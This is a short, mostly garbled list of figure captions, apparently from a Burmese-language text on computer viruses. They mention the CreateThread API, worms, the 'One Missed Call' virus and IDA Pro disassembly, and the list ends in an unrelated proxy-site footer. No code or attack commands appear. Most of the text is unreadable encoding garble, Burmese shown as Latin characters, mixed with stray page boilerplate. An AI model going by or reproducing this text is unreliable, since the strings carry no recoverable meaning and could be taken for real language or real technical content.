36/ CreateThread API udktoHk;jyKNyD; Worm onf ¤if;\udk,fyGm; Thread wpf&mudkyGm;&ef

yHk(200) Magway FC Adkif;&yfpfpful;pufcHxm;&aom

yHk(244) M Hackingg Day Adkif;&yf

One Missed Call Adkif;&yfpf

yHk(27) One Missed Call Adkif;&yfpf\ Virus Information.txt

yHk(322) IDA Pro Disassembller jzifh Akdif;&yf

You might also like

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.